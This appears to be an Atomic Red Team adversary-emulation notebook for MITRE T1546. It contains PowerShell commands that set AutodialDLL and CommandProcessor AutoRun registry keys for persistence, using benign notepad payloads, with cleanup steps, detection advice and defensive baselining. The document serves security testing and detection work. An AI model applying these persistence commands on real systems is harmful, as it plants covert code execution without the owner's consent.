# T1546 - Event Triggered Execution
Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. Cloud environments may also support various functions and services that monitor and can be invoked in response to specific cloud events.(Citation: Backdooring an AWS account)(Citation: Varonis Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)

Adversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.(Citation: FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia malware)

Since the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges. 

## Atomic Tests

### Atomic Test #1 - Persistence with Custom AutodialDLL
The DLL pointed to by the AutodialDLL registry key is loaded every time a process connects to the internet. Attackers can gain persistent code execution by setting this key to a DLL of their choice. 

The sample dll provided, AltWinSock2DLL, will launch the notepad process. Starting and stopping a web browser such as MS Edge or Chrome should result in the dll executing.
[Blog](https://www.mdsec.co.uk/2022/10/autodialdlling-your-way/)

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: AltWinSock2DLL DLL must exist on disk at specified at PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll

##### Check Prereq Commands:
```powershell
if (Test-Path PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll) { exit 0} else { exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\T1546\bin\" -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546/bin/AltWinSock2DLL.dll" -OutFile "PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll"

```

In [ ]:
Invoke-AtomicTest T1546 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters -Name AutodialDLL -Value PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll
```

In [ ]:
Invoke-AtomicTest T1546 -TestNumbers 1

#### Cleanup: 
```powershell
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters -Name AutodialDLL -Value  $env:windir\system32\rasadhlp.dll```

In [ ]:
Invoke-AtomicTest T1546 -TestNumbers 1 -Cleanup

### Atomic Test #2 - HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
[reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
New-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor" -Name "AutoRun" -Value "notepad.exe" -PropertyType "String"```

In [ ]:
Invoke-AtomicTest T1546 -TestNumbers 2

#### Cleanup: 
```powershell
Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor" -Name "AutoRun" -ErrorAction Ignore```

In [ ]:
Invoke-AtomicTest T1546 -TestNumbers 2 -Cleanup

### Atomic Test #3 - HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation)An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
[reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
$path = "HKCU:\Software\Microsoft\Command Processor"
if (!(Test-Path -path $path)){
  New-Item -ItemType Key -Path $path
}
New-ItemProperty -Path $path -Name "AutoRun" -Value "notepad.exe" -PropertyType "String"```

In [ ]:
Invoke-AtomicTest T1546 -TestNumbers 3

#### Cleanup: 
```powershell
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Command Processor" -Name "AutoRun" -ErrorAction Ignore```

In [ ]:
Invoke-AtomicTest T1546 -TestNumbers 3 -Cleanup

## Detection
Monitoring for additions or modifications of mechanisms that could be used to trigger event-based execution, especially the addition of abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network. Also look for changes that do not line up with updates, patches, or other planned administrative activity. 

These mechanisms may vary by OS, but are typically stored in central repositories that store configuration information such as the Windows Registry, Common Information Model (CIM), and/or specific named files, the last of which can be hashed and compared to known good values. 

Monitor for processes, API/System calls, and other common ways of manipulating these event repositories. 

Tools such as Sysinternals Autoruns can be used to detect changes to execution triggers that could be attempts at persistence. Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques.  

Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement. 


## Shield Active Defense
### Baseline 
 Identify key system elements to establish a baseline and be prepared to reset a system to that baseline when necessary. 

 Identify elements of software and configuration critical to a set of objectives, define their proper values, and be prepared to reset a running system to its intended state.  
#### Opportunity
There is an opportunity to use tools and controls to stop an adversary's activity.
#### Use Case
A defender can revert a system to a verified baseline a frequent, recurring basis in order to remove adversary persistence mechanisms.
#### Procedures
Maintain a verified baseline firewall configuration and use that copy as a fallback if an adversary alters that information.
Maintain a verified list of group policies enforced on a system and use that copy if an adversary attempts to deviate from the baseline.
